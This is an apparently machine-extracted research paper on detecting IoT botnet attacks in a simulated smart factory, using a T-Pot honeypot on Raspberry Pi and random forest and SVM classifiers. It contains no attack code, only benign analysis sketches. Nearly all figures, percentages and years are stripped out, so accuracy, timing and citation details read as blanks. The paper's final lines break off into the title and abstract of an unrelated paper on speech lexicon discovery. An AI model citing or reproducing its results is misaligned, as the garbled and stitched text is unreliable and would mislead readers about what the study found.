of data leakage and data abuse, real-time detection of cyber attacks to smart factory obviously becomes an extremely important factor to take into consideration of developing and improving security network of the smart factory (brett et al., ). network security in the smart factory is highly at risk of being under cyber attacks due to the interconnection of a huge number of iot equipment. according to a recent report, instability is recognized as one of the biggest limitations out of vulnerable features found in the iot devices (casalinuovo, ). as a result, cyber attack to smart factories can easily spread to not only quality process control and production control, but also product design which can be analyzed or copied by unauthorized or illegal accesses. in the worse scenario, highly confidential information such as process know-how, requirements figure function requirements of smart factory. features for each layer are shown. full-size doi: . /peerj-cs. /fig- lee et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of data analysis, product design drawings, r&d results are shared outside of the smart factory. such threats of information leakage can cause serious damages and economic losses to both manufacturing and business sectors. this kind of cyber attack can be done by the act of exploiting security vulnerabilities in the ict system via remote control or surveillance of systems in the iot smart factory. one of the most serious cyber attacks to smart factory is botnet. an example of the botnet attack is a temporary unavailability on some commercial websites such as amazon, netflix, twitter, cnn and paypal. a notable case ever recorded is the attack on the dyn dns infrastructure, which mobilized , iot devices (mainly cctv cameras) in october . another example is the new mirai-source-code being launched in . 
these mirai-induced iot botnets have occurred frequently in recent years, with very serious consequences. therefore, it is very important and urgent to identify and mitigate iot botnets through the development of new technologies for network security (ozcelik, chalabianloo & gur, ). as the number of attacks has soared due to unstable iot devices in the internet infrastructure, smart factories can easily become an ideal victim of an iot botnet attack. among many detection methods, the honeypot has been investigated for detecting botnet attacks in various studies in recent years (ja'fari et al., ). however, the huge volume of attack data collected by a honeypot is highly complex and unclassified. this lowers the efficiency of botnet detection by the honeypot method in terms of time taken and accuracy. in order to improve the efficiency, it is crucial to focus on classifying botnet attack information and obtaining botnet attacking behaviors (in other words, intrusion types). in this particular area of dealing with big data, artificial intelligence or machine learning has recently been applied effectively to speed up data processing and to make predictions as well as detections (seungjin, abdullah & jhanjhi, ). hence, machine learning is a promising tool for botnet classification, which has notably not yet been investigated in previous studies, especially in the smart factory environment. therefore, this study aimed to investigate the feasibility of combining a honeypot with machine learning in developing a botnet detection model for iot smart factories. in this work, a hardware configuration representing the physical layout of a smart factory was built and installed with honeypot software combined with machine learning. the whole setup was then programmed to run a simulation to detect and classify botnet attacks into intrusion types.
problem statement
the problem statement can be elaborated with the following points:
- a huge amount of attack data collected by the honeypot is highly complex.
- without data classification, the efficiency of the honeypot model is low, since botnet detection currently takes a long time yet achieves low accuracy.
- a very limited number of studies have focused on botnet detection for the smart factory.
- the strategy of using a honeypot with machine learning has been suggested only very recently, with only a study framework and no model verification to support it.
study approach
- apply machine learning as a supporting tool for classifying botnet attacks captured in log files generated by the honeypot.
- select the random forest algorithm for machine learning to improve the classification process.
- test the model on a hardware configuration mimicking a real smart factory environment.
related work
various botnet detection methods and their rationale are described in the taxonomy in fig. . besides, a smart factory is layered into the perception (physical), communication, network, data and application layers, each with its own function, as shown in the taxonomy of the same figure. comparisons of various detection models are presented in table . real-time detection is a very important factor that smart factories seek (katz, piantanida & debbah, ).
- a honeypot can respond to attacks in real time and attract attackers to deceptive assets instead of actual assets (duessel et al., ).
- for binary and anomaly detection methods, however, the real-time response is slower than that of the honeypot method (gerstmayer et al., ; fenzl et al., ).
figure: taxonomies for botnet detection and security layers of iot smart factories; the combination of honeypot detection with the perception layer is shown.
- binary detection is simple in structure, using 0s and 1s, but its detection processing speed is too low to be compatible with a smart manufacturing environment that seeks real-time detection (katz, piantanida & debbah, ).
- although the command and control (c&c) method targets http-based botnet detection and expansion, its structure is not simple to implement and its detection results have a high false-positive rate (fedynyshyn, chuah & tan, ).
- in terms of cost effectiveness, the honeypot has an advantage since it requires a relatively low cost of construction and management (aziz, ).
with an increasing interest in its potential application, machine learning offers a new solution for detecting abnormalities in malicious internet traffic. in fact, the internet traffic that allows communication between iot devices is distinct from the internet connectivity of general internet-connected devices such as smartphones, computers, and laptops, which runs on a variety of web servers. moreover, for iot devices, network traffic patterns repeat with the regularity of network pings with small packets for logging. applying machine learning to botnet detection for smart factories can be useful for enhancing the performance of the honeypot model in terms of speeding up the processing or detection time (lim et al., ). interestingly, there have been very few studies attempting to mount both a honeypot and machine learning on iot device networks to target attacks on iot traffic. table summarizes a few studies on botnet detection using the honeypot and/or machine learning approaches.
- iot botnet detection is an approach that designs a detection model based on binary indicators, under the hypothesis that a botnet attacks the iot device (choi, yang & kwak, ). although monitoring algorithms for the infected iot device are simple and easy through web services, the limited capacity of iot devices is a restriction on iot botnet detection.
- another approach to detecting botnets uses machine learning, which gave a high detection accuracy of . % (wang et al., ). however, one disadvantage of the machine learning approach is that fast detection is hard to achieve with a randomized number of packets. consequently, the feasibility of applying this approach to smart manufacturing needs more research into the real-time factor and accuracy.
- botnet detection using a honeypot integrated with iot, named iot honeypot, was studied in the smart factory environment (dowling, schukat & melvin, ). in comparison with the machine learning approach of wang et al. ( ), the iot honeypot approach is able to gather information at high speed with less resource consumption (jiafu et al., ). although the iot honeypot approach has been shown to be scalable by applying it to iot sandboxes to support high protocols, further expansion to various situations and environments is needed, with features to activate the architecture of the iot devices (jiafu et al., ).
- one study suggested applying machine learning to detect botnets in the smart factory environment (park, li & hong, ). on the one hand, the machine learning approach can reduce cost, which is an advantage. on the other hand, a low detection rate and high complexity and uncertainty are recognized as big limitations. thus, it might not be suitable for smart factories unless machine learning is combined with a context-aware intrusion detection system, which bears an additional cost.
- advancing from the iot honeypot approach and the machine learning approach, a honeypot combined with machine learning, named honeypot machine learning, uses learned logging for detection and tracking at high accuracy (vishwakarma, ). compatible with most standard equipment across various functions, the honeypot machine learning approach is suitable for the performance of a smart factory with minimal resources required. hence, it is likely to be adopted in the future (vishwakarma, ).
among the approaches discussed, the iot botnet and honeypot machine learning approaches show effective results in detecting botnets. both can trace attacks through logging at low cost and are the most cost-saving for iot devices. notably, the feasibility of applying the honeypot machine learning approach in the smart factory in particular has yet to be investigated in any study, as highlighted in a recent review (seungjin, abdullah & jhanjhi, ). therefore, more botnet detection research should look into this particular area for application in the smart factory.
materials and methods
proposed model
this section focuses on three main aspects. the first and second aspects describe the configuration and simulation of hardware in a virtual smart factory environment. the last aspect presents the algorithms of the honeypot detection model in combination with machine learning programming.
configuration of hardware for a virtual smart factory environment
in the configuration setup, some iot devices (camera, rfid, temperature sensors) and two raspberry pi devices (pi 1 and pi 2) were used to create a virtual smart factory environment. the first raspberry pi (pi 1) was assigned as the actual main iot data collection server by installing opencv. it was responsible for transmitting collected iot data to the main pc. the t-pot platform was chosen because it is suitable for virtual experiments using a raspberry pi and allows real-time botnet detection to be monitored through dashboards. the second raspberry pi (pi 2) was installed with a virtual server (vm) running the t-pot platform so that the collection of detection information in this environment was deliberately established. one assumption was that a botnet attacked the raspberry pi (honeypot server) using the feature botnet datasets. raspberry pi 1 and pi 2 were installed on a log server to keep the information on the iot product line in the factory and records of botnet attack patterns and time zones, making them easy to track. the operating mechanism of the honeypot combined machine learning model in the smart factory is illustrated in fig. . when an attacker attempted to inject malicious code through an open port, this step was done by logging into an iot device at the physical resource/perception layer by trying multiple combinations of ids and passwords.
the honeypot intentionally opened its protective wall and presented itself as a target the attacker could reach. the main intention was to obtain information about attackers and malicious botnet code by recording each activity between the device and the intruder in the form of a log file. these log files captured information that allowed administrators to identify the characteristics, transformations, target device types, c&c server ip addresses, and port numbers of new malware suites or botnets. the log file data was then converted to an appropriate table format that could be used as a dataset.
table: a comparison of studies in botnet detection using honeypot and/or machine learning approaches for smart factories (approach; strengths; weaknesses; research gap; refs.).
- machine learning for the smart factory environment: cost reduction; detection rate and accuracy are very low, and the system is complicated; building machine learning and context-aware intrusion detection systems for information that will be leaked from manufacturing processes; park, li & hong ( ).
- iot botnet: monitoring of web-based real-time iot equipment, easy and simple interface; limited capacity; new optimization requires expansion of utilization; choi, yang & kwak ( ).
- machine learning: . % graph-based detection accuracy; difficult to apply to flow-based detectors; a graph-based botmark is required to increase the accuracy of botnet detection; wang et al. ( ).
- iot honeypot: fast information gathering, less resource consumption; unnecessary data piles up; it is necessary to activate the network protocol by expanding iot equipment and the sandbox; jiafu et al. ( ).
- honeypot machine learning: real-time monitoring with the combination of honeypot and machine learning; it is greatly affected by the system environment, problems with device data capacity; cloud server application; vishwakarma ( ).
table: comparison of the honeypot with other detection methods.
- honeypot: configuration: high-interaction virtual server; advantages: monitors the interaction of the grid with infected devices; disadvantages: the analysis of information on an attack is slow and passive; refs.: zhang et al.; duessel et al.
- binary detection: configuration: binary; advantages: user-friendly ui system, easily applicable to multi-connection systems; disadvantages: spends a lot of time on training; refs.: gerstmayer et al.
- anomaly detection: configuration: p p; advantages: capable of detecting zero-day attacks as well; disadvantages: not a simple structure, high false positives; refs.: fenzl et al.
- c&c detection: configuration: command & control server; advantages: able to detect and expand http-based botnets; disadvantages: not a simple structure, high false positives; refs.: fedynyshyn, chuah & tan.
a machine learning (ml) tool was then trained with the dataset, which contained network parameters. these parameters were based on the most common features of iot botnet attacks on smart factories reported in previous work studying the network architecture and network types used in the physical layer of smart factories, smart home networks, and smart cities (fan et al., ; almusaylim & zaman, ; humayun et al., ). the algorithm written for this ml tool classified botnet data using r-studio and weka. memory-efficient classification was desirable, predicting useful information from less training data to prevent the iot devices from becoming overwhelmed. afterwards, appropriate measures were taken according to the results of the classification. whenever the process exceeded the allowed size of training data, it would repeat dynamically.
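purely as an illustration of the log-to-table conversion described above, the following python sketch flattens json-lines honeypot records into a tabular dataset that a classifier can consume; the file name, field names, and record layout are assumptions rather than the actual t-pot schema used in the study.

```python
import json
import pandas as pd

# Fields we assume each honeypot log record carries; the real T-Pot
# schema differs per honeypot daemon, so treat these names as placeholders.
FIELDS = ["timestamp", "src_ip", "dest_port", "protocol", "credentials", "payload_size"]

def logs_to_table(log_path):
    """Flatten JSON-lines honeypot records into a pandas DataFrame."""
    rows = []
    with open(log_path) as f:
        for line in f:
            record = json.loads(line)
            rows.append({field: record.get(field) for field in FIELDS})
    return pd.DataFrame(rows)

if __name__ == "__main__":
    table = logs_to_table("honeypot.log")   # hypothetical log file name
    table.to_csv("honeypot_dataset.csv", index=False)
    print(table.head())
```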
figure: operating mechanisms of botnet attacks on the physical sensing layer of a smart factory and the design of the honeypot combined machine learning model; botnet detection by the honeypot at the physical layer is shown.
simulation of hardware design with raspberry pi transferring log files
each product in the smart factory was attached with a radio-frequency identification (rfid) tag containing its information. a camera read the rfid tags to collect product information. the collected information was then stored in raspberry pi 1 and pi 2 as the calling terminals. in other words, the setup was programmed to transmit the collected data to the iot service server of the network through a terminal (camera, temperature, and rfid iot devices). the information kept in pi 1 and pi 2 as a log file was then transferred to the server of the main pc. this process simulation is illustrated in fig. .
figure: simulation of hardware design; the collection of product information by the raspberry pi is shown.
raspberry pi setting: data transporting opencv
the transporting and receiving of data in this virtual environment were similar to those taking place in a real smart factory. data transporting opencv was used as a collection of python classes that transferred opencv images and data from the raspberry pi to the main computer via data transporting opencv messages. for example, video and picture streams were shown simultaneously on the main computer screen by sending the signal data of the raspberry pi, as shown in fig. . an algorithm was required on the main pc and the raspberry pi for such data transfer, as shown in table .
raspberry pi setting: t-pot honeypot platform
after setting up raspberry pi 1 with data transporting opencv, raspberry pi 2 was set up with the t-pot honeypot platform followed by a virtual machine (vm). verification and testing were done on all the honeypots so that they were balanced at runtime. to do this task, a studio state command line was used to write a script and verify the transmission of the log file. the script in fig. shows the load on the platform, the status of each honeypot, and the uptime. furthermore, the data collected by the honeypot was visually displayed using the kibana dashboard, showing the network attacked by malicious users and botnets. the kibana dashboard shown in fig. is convenient and comprehensive for analyzing the type, location, and threat actors of the botnet attacks that infiltrated the raspberry pi server inside the vm. it has many potential uses for data systems and metric collection in a smart manufacturing environment that requires real-time monitoring.
honeypot and machine learning classification process design and algorithms
the diagram in fig. describes the process design for botnet detection by the honeypot combined with the machine learning classification model. the entire process consisted of two stages. the first stage (honeypot simulation) took place at the raspberry pi server, which finished loading by checking botnet credentials and then started honeypot detection in the t-pot platform. to verify botnet credentials in this step, a user name and password must be provided.
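as a toy illustration only of this stage-1 credential gate (user names, passwords, and the start-up call are hypothetical; real authentication is handled by the t-pot platform itself), the check could be sketched in python as follows.

```python
# Hypothetical table of authorized users; a real deployment would never
# hard-code credentials like this.
AUTHORIZED_USERS = {"admin": "factory-pass", "operator": "line-01"}

def start_detection_if_authorized(username, password):
    """Start honeypot detection only when valid credentials are supplied (stage 1)."""
    if AUTHORIZED_USERS.get(username) != password:
        print("credential check failed; honeypot detection not started")
        return False
    # Placeholder standing in for launching the T-Pot detection stack.
    print("credentials accepted; starting honeypot detection")
    return True

if __name__ == "__main__":
    start_detection_if_authorized("admin", "factory-pass")
```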
accurate information given by authorized users allowed the process to proceed to start honeypot detection. the verification step took approximately s.
figure: raspberry pi image transfer data; data captured by the iot camera is shown.
table: algorithm of data transfer in raspberry pi.
algorithm: raspberry pi image data transfer
input: list of data transfers
output: pi image data (task mapped to vm)
begin
  true: cv, vm; show streamed images and data
  if two tasks get data from rfid, image, signal then
    pick task with earliest
  else
    transfer data
  while vm
    compute utilization
    send image, signal each
  repeat
    if data is available & task allocated then
      migrate task to less utilized data
    else
      start scheduling
  until all send images as stream
  image = pi cam read
end
figure: t-pot test script for raspberry pi; user account checking in t-pot is shown.
moving to stage 2 (log data collection), the data obtained earlier from the authorized users in stage 1 was processed through a series of steps, that is: retrieve logs, extract records, filter, text processing, upload, and end the automated process. the text processing step before uploading was where machine learning was integrated with the honeypot for the purpose of classifying botnet attacks, as illustrated in fig. . as a result of classification, botnet attacking behaviors or botnet intrusion types were obtained and then used for machine learning training to detect botnets. after machine learning classification, the processed data was converted to an output result file and uploaded to end the automatic process. the algorithm for botnet classification by machine learning is shown in table .
figure: kibana dashboard; metrics are shown by integrating real-time detection threat charts, maps, and filters.
instructions to verify the code and dataset (a python analogue of these steps is sketched after this list):
1. read the package settings for caret, dplyr, and readr in the library (this package set can balance the dataset for the four categories of botnet attacks).
2. make settings on the computer for the dataset with the frame set and honeypot log file.
3. start the test based on the best feature data and wait until the true setting comes out.
4. proceed to filter, extract records, review logs, and test processing.
5. apply (flgs_number, srate, drate, rate, max, state_number, mean, min, stddev, seq) to each classified category.
6. obtain log files as samples for machine learning, classifying into four types of botnets (distributed denial of service (ddos), dos, reconnaissance, and theft).
7. call in the algorithm (random forest or svm) to start classification.
8. predict botnets based on the classification results in terms of accuracy, time taken, false positive rate, and p-value.
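the study itself performed these steps with caret, dplyr, and readr in r-studio and with weka; purely as an illustration, an analogous python/scikit-learn version of steps 3 to 8 might look like the sketch below, where the csv file name and the label column are assumptions.

```python
import time
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split

# The ten flow features listed in step 5 and the four attack categories in step 6.
FEATURES = ["flgs_number", "srate", "drate", "rate", "max",
            "state_number", "mean", "min", "stddev", "seq"]
LABEL = "category"   # expected values: DDoS, DoS, Reconnaissance, Theft

data = pd.read_csv("honeypot_dataset.csv")        # hypothetical dataset file
X_train, X_test, y_train, y_test = train_test_split(
    data[FEATURES], data[LABEL], test_size=0.2,
    stratify=data[LABEL], random_state=0)

clf = RandomForestClassifier(n_estimators=100, random_state=0)

start = time.time()
clf.fit(X_train, y_train)
predictions = clf.predict(X_test)
elapsed = time.time() - start

print(f"accuracy: {accuracy_score(y_test, predictions):.4f}")
print(f"time taken: {elapsed:.3f} s")
```

swapping in sklearn.svm.SVC for the random forest reproduces the svm variant mentioned in step 7.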
results
in this section, results were collected mainly from the machine learning classification of botnet attacks. the data collection for the experiment was randomized where the reference dataset was used. the experiment was carried out using a raspberry pi and a personal computer. the features of the selected dataset are first described in the dataset section. to perform the classification on the dataset, the honeypot combined machine learning model simulation was run with two techniques, that is, weka and rstudio. the collected results were evaluated by comparing the two techniques with each other and with another study.
dataset
in order to use a machine learning method to identify botnets targeting the iot-based network and physical layer in smart factories, we experimented with the dataset features of koroniotis et al. ( ), which is the most suitable dataset for this study. the dataset used for classification was selected based on ten features that are closely related to the botnet intrusion types. details of the features are presented in table , which was extracted from a direct comparison of entropy and correlation scores in the previous studies (zheng & keong, ; koroniotis et al., ). specifically, transmission information was calculated as correlation indices, which were evaluated for their statistical measurement values. the calculation of the indices was performed using the following equation:
x_i = (x_i - x_min)(b - a) / (x_max - x_min) + a
the model simulation was evaluated using some of the machine learning evaluation metrics shown in table (koroniotis et al., ). based on the results, the model can be evaluated as to whether it is highly efficient in optimization and able to reduce the error of drate. the values of max and min represent the values of training and response. examples of correlation are shown in fig. (koroniotis et al., ).
classification by weka machine learning
the classification result of the weka machine learning technique for the four types of botnet attacks, namely ddos, dos, reconnaissance, and theft, is shown in fig. . for instance, the average percentage of correct predictions (accuracy) over all four botnet attacks reached . %. the kappa statistic showed that the model stability was . , with a mean absolute error of just . . in terms of accuracy and precision for each type of attack, reconnaissance has the highest values. furthermore, after collecting pcap files from the virtual settings, statistical measures using correlation coefficients and entropy techniques were adopted to extract flow data using argus tools in order to evaluate datasets based on the best features. a new function was created based on the transaction flow of network connections to find out normal and intrusive events. a machine learning model was trained and validated on different versions of the datasets to assess their value compared to other datasets, as shown in fig. .
classification by rstudio machine learning
figure shows the results of classification using the rstudio machine learning technique. two methods were used, that is, support-vector machine (svm) and random forest (rf). rf was calculated using the decision tree (dt) to predict mean values. rf was selected because it showed effective detection on discrete datasets such as botnets (kok, abdullah & jhanjhi, ).
figure: process design of the honeypot combined machine learning model to detect botnet attacks in the smart factory; the honeypot simulation and log data collection classification flowchart is shown.
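for reference, the min-max scaling equation above and the standard evaluation metrics used in the following tables can be written compactly in python as follows (a generic numpy sketch with illustrative values, not code from the study).

```python
import numpy as np

def min_max_scale(x, a=0.0, b=1.0):
    """Rescale a feature vector x into the interval [a, b]."""
    x = np.asarray(x, dtype=float)
    return (x - x.min()) * (b - a) / (x.max() - x.min()) + a

def detection_metrics(tp, fp, tn, fn):
    """Accuracy, precision, recall, and fall-out from confusion counts."""
    return {
        "accuracy": (tp + tn) / (tp + tn + fp + fn),
        "precision": tp / (tp + fp),
        "recall": tp / (tp + fn),
        "fall_out": fp / (fp + tn),
    }

if __name__ == "__main__":
    print(min_max_scale([3.0, 7.0, 11.0]))              # -> [0.0, 0.5, 1.0]
    print(detection_metrics(tp=90, fp=5, tn=100, fn=10))  # illustrative counts
```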
the evaluation of the classification results was based on nine parameters, namely sensitivity, specificity, positive predictive value, negative predictive value, prevalence, detection rate, detection prevalence, balanced accuracy, and average. in the rf method, a high accuracy of . was achieved. the % confidence intervals were . and . . the rf provided a kappa of . . however, for the svm method, the accuracy obtained was . , which is much lower than that of the rf. the % confidence intervals were . and . .
table: algorithm for data classification.
algorithm: botnet-based classification with ml and honeypot detection for improving the security of the smart factory iot
input: list of classified feature-valued training data sets (t1, t2, t3, …, tn) & vm
output: feature tasks dt
begin
  initialization: dt; sort tasks according to dt ascendingly
  if dt belongs to the same vm
    ta = testing attribute
    combine dt = t
  else
    prioritize based on (data set)
  for each vm i = 1 to n
    calculate information_gain
  repeat
    if a change is an available factor & ta then
      for each df in the splitting of ta
        if (t' is empty)
    else
      start to get a sample again
  until all features are allocated to a vm
end
table: ten features of the selected dataset for classification (name: description).
- srate: foundation-to-target packets per second
- drate: target-to-foundation packets per second
- rate: overall packets per second in the transaction
- max: maximum period of collected source records
- state_number: numerical illustration of the characteristic state
- mean: average period of collected records
- min: minimum time of collected records
- stddev: standard deviation of the total aggregated records
- flgs_number: numerical representation of the feature flags
- seq: argus sequence number
table: machine learning evaluation metrics.
accuracy: acc = (tp + tn) / (tp + tn + fp + fn)
precision: ppv = tp / (tp + fp)
recall: tpr = tp / (tp + fn)
fall-out: fpr = fp / (fp + tn)
notes: tp (true positive): number of botnet containers represented as botnet. fp (false positive): number of regular containers symbolized as botnet. tn (true negative): number of normal containers represented as standard traffic. fn (false negative): number of botnet containers symbolized as standard traffic.
figure: detailed accuracy by classification; the estimated trend for each botnet type is shown.
figure: correlation of true vs. false positive rates for the best features. (a) roc curve for the rf, svm model (area = . ); (b) roc curve for the rf, svm model (area = . ).
as can be seen in fig. , the classification of the ddos attack type is highly efficient using rstudio with respect to all evaluating parameters. the detection rate and detection prevalence have low probabilities of . and . , respectively. the overall detection using r-studio showed a statistically significant result since the p-value is less than %.
discussion
the two machine learning programs (weka and rstudio) following the random forest algorithm showed good classification results, comparable with another study as shown in fig. . in the study of mathur, raheja & ahlawat ( ), botnets were detected via mining of the network traffic flow with the random committee method.
the resultant accuracy of the random committee was achieved at %, which was . % lower than those obtained in this study ( . % for random forest-weka and % for random forest-rstudio).
figure: correlation of features for weka machine learning; the training and testing classification result is shown.
figure: r-studio results; the ddos attack type is highly aggressive.
in terms of time taken, both random forest-weka and random committee were able to detect botnets within a very short time of . s or . ms, whereas it took a much longer time of . s for random forest-rstudio to detect botnets because of its program package. in addition, regarding the p-value representing the significance of the detection models, the p-value for random forest-rstudio was less than % ( . × − ), which showed that the detection model is statistically significant. as mentioned earlier, real-time detection is the key factor for the network security of the smart factory; the random forest method is therefore considered highly suitable for a smart factory environment operating around the clock. the result of this study can be said to be only relatively comparable with the work of mathur, raheja & ahlawat ( ), since both studies were based on network traffic flow and targeted the botnet attack. however, regarding the feasibility of application in the smart factory environment, this study appears more feasible for two reasons. first, the experiments were conducted on a hardware simulation specifically configured to mimic the real smart factory environment using iot devices, as mentioned in the proposed model section, which is lacking in the work of mathur, raheja & ahlawat ( ). secondly, the experimental results obtained in this study directly addressed the three deciding factors (time taken: . ms, accuracy: above %, and fpr: . ; refer to table ), which are very useful for evaluating any tested method being applied in the smart factory.
figure: graphical comparison of random forest in this study with random committee in another study. (a) accuracy; (b) time taken; (c) p-value; and (d) fpr value.
in contrast, the latest published work reported a study based on the smart factory ambient environment to detect context-aware intrusions using machine learning (park, li & hong, ). however, that study did not mention targeting any specific types of cyber attacks or viruses, only anomaly signs. another limitation of that study is that its result stated only a very general possibility of process improvement of % from . % (park, li & hong, ). without showing the three deciding factors (time taken, accuracy, and fpr), it is hardly possible to evaluate its feasibility of application for the smart factory. in addition, the part about using machine learning for training to obtain intrusions did not mention including the best features of the smart factory in the datasets. including them would be very helpful to increase the feasibility or applicability of any detection model at the physical layers with the interconnection of many iot devices, as this present study was conducted accordingly.
furthermore, the kibana platform, supporting visualization of the system/model performance, could provide a user-friendly interface for administrators in the smart factory to analyze from a variety of perspectives beyond just a visible display. this study has provided a basic background for developing a security network specifically for the smart factory environment, with a hardware configuration mimicking iot devices and the random forest algorithm for the experimental work. the results can be used as reference points or benchmarks for comparison with other future studies relating to the smart factory. in fact, the number of studies focusing on the security network for the smart factory that specifically target botnet attacks using a honeypot is currently scarce throughout the literature; future work can be based on this smart factory hardware configuration design for the experimental testing of models or systems. also, it is suggested to further this study by conducting experiments in a real smart factory. by doing that, a better result can be obtained for analysis when many factors of smart factories are taken into consideration; in this study, a controlled virtual smart factory environment was created instead. the expected results will be more valuable for improving the productivity of smart factories.
conclusions
in this work, the model combining a honeypot with machine learning proved feasible for detecting botnets in the smart factory. since a botnet can easily spread into the iot smart factory environment with high risk, the hardware-based simulation and classification using the random forest algorithm in the weka machine learning program showed a very good result: . % accuracy and a detection time of . ms were achieved for the proposed model, and the fpr was low at just . .
table: result comparison between the random forest and random committee algorithms (accuracy (%); time taken (detection time); false positive rate (fpr); p-value; refs.).
- random forest-weka: . ; . s; . ; –; this study
- random forest-rstudio: ; . s; . ; . ; this study
- random committee: . ; . s; . ; –; mathur, raheja & ahlawat ( )
comparing this result to other studies showed that the proposed model (honeypot combined with machine learning to detect and classify botnet attacks) in the smart factory was evaluated to be better because of three outstanding advantages. first, iot devices were used in the hardware simulation configured to mimic the real smart factory environment. second, the model testing showed a short time taken ( . ms), high accuracy (above %), and a low fpr ( . ) for the random forest weka machine learning as the deciding factors. lastly, machine learning was trained on a dataset that included the best features of the smart factory to obtain intrusions.
acknowledgements
the authors acknowledge the support of taylor's university, school of computer science and engineering, in carrying out this experimental research work. this research work underwent english proofreading prior to submission to this journal.
additional information and declarations
funding
the authors received no funding for this work.
competing interests
the authors declare that they have no competing interests.
author contributions
- seungjin lee conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- azween abdullah analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
- nz jhanjhi analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
- sh kok performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
data availability
the following information was supplied regarding data availability: raw data is available at koroniotis et al. ( ). code is available in the supplemental files.
supplemental information
supplemental information for this article can be found online.
references
almusaylim za, zaman n. . a review on smart home present state and challenges: linked to context-awareness internet of things (iot). wirel networks ( ): – .
aziz a. . a soft-decision fusion approach for multiple-sensor distributed binary detection systems. ieee transactions on aerospace and electronic systems ( ): – .
brett s-g, marco c, lorenzo c, bob g, martin s, richard k, christopher k, giovanni v. . your botnet is my botnet: analysis of a botnet takeover. in: proceedings of the acm conference on computer and communications security. – .
casalinuovo e. . thematic investment opportunity: internet of things. pennsylvania: pnc financial services group, inc. available at https://www.pnc.com/content/dam/pnc-thought-leadership/pdf/wealth-management/hawthorn/thematic-investing_internet_of_things.pdf.
chen b, wan j, shu l, li p, mukherjee m, yin b. . smart factory of industry . : key technologies, application case, and challenges. ieee access (c): – .
choi sk, yang ch, kwak j. . system hardening and security monitoring for iot devices to mitigate iot security vulnerabilities and threats. ksii transactions on internet and information systems ( ): – .
dowling s, schukat m, melvin h. . a zigbee honeypot to assess iot cyberattack behaviour. in: th irish signals and systems conference (issc). piscataway: ieee, – .
duessel p, gehl c, flegel u, dietrich s, meier m. . detecting zero-day attacks using context-aware anomaly detection at the application-layer. international journal of information security ( ): – .
fan y, zhao g, li kc, zhang b, tan g, sun x, xia f. . snpl: one scheme of securing nodes in iot perception layer. sensors ( ): – .
fedynyshyn g, chuah mc, tan g. . detection and classification of different botnet c&c channels. lecture notes in computer science : – .
fenzl f, rieke r, chevalier y, dominik a, kotenko i. . continuous fields: enhanced in-vehicle anomaly detection using machine learning models. simulation modelling practice and theory (june): .
gerstmayer f, hausladen j, kramer m, horauer m. . binary protection framework for embedded systems. in: th ieee international symposium on industrial embedded systems (sies), – june . piscataway: ieee.
guo d, zhong ry, ling s, rong y, huang gq. . a roadmap for assembly . : self-configuration of fixed-position assembly islands under graduation intelligent manufacturing system. international journal of production research ( ): – .
humayun m, jhanjhi nz, alamri mz, khan a. . smart cities and digital governance: employing recent technologies for improved digital governance. hershey: igi global, – .
ja'fari f, mostafavi s, mizanian k, jafari e. . an intelligent botnet blocking approach in software defined networks using honeypots. journal of ambient intelligence and humanized computing.
jiafu w, shenglong t, zhaogang s, di l, shiyong w, muhammad i, athanasios vv. . software-defined industrial internet of things in the context of industry . . ieee sensors journal ( ): – .
katz g, piantanida p, debbah m. . distributed binary detection with lossy data compression. ieee transactions on information theory ( ): – .
kok sh, abdullah a, jhanjhi nz. . early detection of crypto-ransomware using pre-encryption detection algorithm. journal of king saud university - computer and information sciences.
koroniotis n, moustafa n, sitnikova e, turnbull b. . towards the development of realistic botnet dataset in the internet of things for network forensic analytics: bot-iot dataset. future generation computer systems : – .
li x, li d, wan j, liu c, imran m. . adaptive transmission optimization in sdn-based industrial internet of things with edge computing. ieee internet of things journal ( ): – .
lim m, abdullah a, jhanjhi nz, khurram khan m, supramaniam m. . link prediction in time-evolving criminal network with deep reinforcement learning technique. ieee access : – .
mathur l, raheja m, ahlawat p. . botnet detection via mining of network traffic flow. procedia computer science : – .
mittal s, khan ma, romero d, wuest t. . smart manufacturing: characteristics, technologies and enabling factors. proceedings of the institution of mechanical engineers, part b: journal of engineering manufacture ( ): – .
ozcelik m, chalabianloo n, gur g. . software-defined edge defense against iot-based ddos. in: ieee cit - th ieee international conference on computer and information technology. piscataway: ieee, – .
oztemel e, gursev s. . literature review of industry . and related technologies. journal of intelligent manufacturing ( ): – .
park st, li g, hong jc. . a study on smart factory-based ambient intelligence context-aware intrusion detection system using machine learning. journal of ambient intelligence and humanized computing : – .
park st, li g, hong jc. . a study on smart factory-based ambient intelligence context-aware intrusion detection system using machine learning. journal of ambient intelligence and humanized computing ( ): – .
ramos ksh, monge mas, vidal jm. . benchmark-based reference model for evaluating botnet detection tools driven by traffic-flow analytics. sensors ( ): – .
seungjin l, abdullah a, jhanjhi nz. . a review on honeypot-based botnet detection models for smart factory. international journal of advanced computer science and applications ( ): – .
smith ms. . protecting privacy in an iot-connected world. information and management journal ( ): – .
vishwakarma r. . a honeypot with machine learning based detection framework for defending iot based botnet ddos attacks. in: rd international conference on trends in electronics and informatics, tirunelveli, tamil nadu, india. – .
wang w, shang y, he y, li y, liu j. . botmark: automated botnet detection with hybrid analysis of flow-based and graph-based traffic behaviors. information sciences : – .
zhang w, zhang b, zhou y, he h, ding z. . an iot honeynet based on multi-port honeypots for capturing iot attacks. ieee internet of things journal ( ): – .
zheng y, keong c. . a feature subset selection method based on high-dimensional mutual information. entropy ( ): – .
unsupervised lexicon discovery from acoustic input
chia-ying lee, timothy j. o'donnell, and james glass
computer science and artificial intelligence laboratory and department of brain and cognitive sciences, massachusetts institute of technology, cambridge, ma, usa
abstract
we present a model of unsupervised phonological lexicon discovery—the problem of simultaneously learning phoneme-like and word-like units from acoustic input. our model builds on earlier models of unsupervised phone-like unit discovery from acoustic data (lee and glass, ), and unsupervised symbolic lexicon discovery using the adaptor grammar framework (johnson et al., ), integrating these earlier approaches using a probabilistic model of phonological variation. we show that the model is competitive with state-of-the-art spoken term discovery systems, and present analyses exploring the model's behavior and the kinds of linguistic structures it learns.
introduction
